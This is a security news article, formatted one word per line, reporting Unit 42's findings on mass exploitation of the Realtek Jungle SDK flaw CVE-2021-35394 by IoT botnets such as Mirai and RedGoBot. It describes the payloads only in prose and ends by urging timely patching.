Researchers
are
warning
about
a
spike
in
exploitation
attempts
weaponizing
a
critical
remote
code
execution
flaw
in
Realtek
Jungle
SDK
since
the
start
of
August
2022.
According
to
Palo
Alto
Networks
Unit
42,
the
ongoing
campaign
is
said
to
have
recorded
134
million
exploit
attempts
as
of
December
2022,
with
97%
of
the
attacks
occurring
in
the
past
four
months.
Close
to
50%
of
the
attacks
originated
from
the
U.S.
(48.3%),
followed
by
Vietnam
(17.8%),
Russia
(14.6%),
The
Netherlands
(7.4%),
France
(6.4%),
Germany
(2.3%0,
and
Luxembourg
(1.6%).
What’s
more,
95%
of
the
attacks
leveraging
the
security
shortcoming
that
emanated
from
Russia
singled
out
organizations
in
Australia.
“Many
of
the
attacks
we
observed
tried
to
deliver
malware
to
infect
vulnerable
IoT
devices,”
Unit
42
researchers
said
in
a
report,
adding “threat
groups
are
using
this
vulnerability
to
carry
out
large-scale
attacks
on
smart
devices
around
the
world.”
The
vulnerability
in
question
is
CVE-2021-35394
(CVSS
score:
9.8),
a
set
of
buffer
overflows
and
an
arbitrary
command
injection
bug
that
could
be
weaponized
to
execute
arbitrary
code
with
the
highest
level
of
privilege
and
take
over
affected
appliances.
The
issues
were
disclosed
by
ONEKEY
(previously
IoT
Inspector)
in
August
2021.
The
vulnerability
impacts
a
wide
range
of
devices
from
D-Link,
LG,
Belkin,
Belkin,
ASUS,
and
NETGEAR.
Unit
42
said
it
discovered
three
different
kinds
of
payloads
distributed
as
a
result
of
in-the-wild
exploitation
of
the
flaw
–
-
A
script
executes
a
shell
command
on
the
targeted
server
to
download
additional
malware -
An
injected
command
that
writes
a
binary
payload
to
a
file
and
executes
it,
and -
An
injected
command
that
directly
reboots
the
targeted
server
to
cause
a
denial-of-service
(DoS)
condition
Also
delivered
through
the
abuse
of
CVE-2021-35394
are
known
botnets
like
Mirai,
Gafgyt,
and
Mozi,
as
well
as
a
new
Golang-based
distributed
denial-of-service
(DDoS)
botnet
dubbed
RedGoBot.
First
observed
in
September
2022,
the
RedGoBot
campaign
involves
dropping
a
shell
script
that’s
designed
to
download
a
number
of
botnet
clients
tailored
to
different
CPU
architectures.
The
malware,
once
launched,
is
equipped
to
run
operating
system
commands
and
mount
DDoS
attacks.
The
findings
once
again
underscore
the
importance
of
updating
software
in
a
timely
fashion
to
avoid
exposure
to
potential
threats.
“The
surge
of
attacks
leveraging
CVE-2021-35394
shows
that
threat
actors
are
very
interested
in
supply
chain
vulnerabilities,
which
can
be
difficult
for
the
average
user
to
identify
and
remediate,”
the
researchers
concluded. “These
issues
can
make
it
difficult
for
the
affected
user
to
identify
the
specific
downstream
products
that
are
being
exploited.”
